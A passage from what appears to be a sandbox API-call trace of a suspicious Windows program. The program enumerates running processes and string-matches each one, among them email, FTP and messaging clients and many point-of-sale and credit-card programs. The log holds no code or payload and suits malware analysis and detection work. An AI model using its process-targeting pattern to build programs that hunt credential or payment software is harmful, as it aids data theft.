[0097.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.392] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35797a0 [0097.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35797a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0097.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0097.392] StrStrIA (lpFirst="outlook.exe", lpSrch="mspub") returned 0x0 [0097.392] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.393] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579680 [0097.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3579680, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0097.393] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0097.393] StrStrIA (lpFirst="pidgin.exe", lpSrch="mspub") returned 0x0 [0097.393] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.394] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579620 [0097.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579620, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0097.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0097.394] StrStrIA (lpFirst="scriptftp.exe", lpSrch="mspub") returned 0x0 [0097.394] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.395] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35797d0 [0097.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35797d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0097.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0097.395] StrStrIA (lpFirst="skype.exe", lpSrch="mspub") returned 0x0 [0097.395] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.396] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35797b8 [0097.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35797b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0097.396] StrStrIA (lpFirst="smartftp.exe", lpSrch="mspub") returned 0x0 [0097.396] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.397] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579758 [0097.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3579758, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0097.397] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0097.397] StrStrIA (lpFirst="thunderbird.exe", lpSrch="mspub") returned 0x0 [0097.397] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0097.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.398] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35795d8 [0097.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35795d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0097.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0097.399] StrStrIA (lpFirst="totalcmd.exe", lpSrch="mspub") returned 0x0 [0097.399] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.399] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579800 [0097.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3579800, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0097.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0097.400] StrStrIA (lpFirst="trillian.exe", lpSrch="mspub") returned 0x0 [0097.400] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.400] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579860 [0097.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3579860, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0097.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0097.401] StrStrIA (lpFirst="webdrive.exe", lpSrch="mspub") returned 0x0 [0097.401] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.402] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35795a8 [0097.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35795a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0097.402] StrStrIA (lpFirst="whatsapp.exe", lpSrch="mspub") returned 0x0 [0097.402] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.403] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579710 [0097.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3579710, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0097.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0097.403] StrStrIA (lpFirst="winscp.exe", lpSrch="mspub") returned 0x0 [0097.403] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.404] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a8f8 [0097.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357a8f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0097.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0097.404] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="mspub") returned 0x0 [0097.404] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.405] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357aa58 [0097.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357aa58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0097.405] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0097.405] StrStrIA (lpFirst="active-charge.exe", lpSrch="mspub") returned 0x0 [0097.405] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.406] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579668 [0097.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3579668, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0097.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0097.406] StrStrIA (lpFirst="accupos.exe", lpSrch="mspub") returned 0x0 [0097.406] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.407] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579728 [0097.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3579728, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0097.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0097.407] StrStrIA (lpFirst="afr38.exe", lpSrch="mspub") returned 0x0 [0097.407] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.408] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579698 [0097.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3579698, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0097.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0097.408] StrStrIA (lpFirst="aldelo.exe", lpSrch="mspub") returned 0x0 [0097.408] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.638] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35797e8 [0097.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35797e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0097.638] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0097.638] StrStrIA (lpFirst="ccv_server.exe", lpSrch="mspub") returned 0x0 [0097.638] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.640] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357a8b8 [0097.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357a8b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0097.640] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0097.640] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="mspub") returned 0x0 [0097.640] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.641] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357aa78 [0097.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357aa78, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0097.641] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0097.641] StrStrIA (lpFirst="creditservice.exe", lpSrch="mspub") returned 0x0 [0097.641] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.642] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35795c0 [0097.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35795c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0097.642] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0097.642] StrStrIA (lpFirst="edcsvr.exe", lpSrch="mspub") returned 0x0 [0097.642] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.830] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35795f0 [0097.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x35795f0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0097.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0097.830] StrStrIA (lpFirst="fpos.exe", lpSrch="mspub") returned 0x0 [0097.830] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.832] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35796b0 [0097.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35796b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0097.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0097.832] StrStrIA (lpFirst="isspos.exe", lpSrch="mspub") returned 0x0 [0097.832] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.833] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357aa18 [0097.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357aa18, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0097.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0097.833] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="mspub") returned 0x0 [0097.833] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, 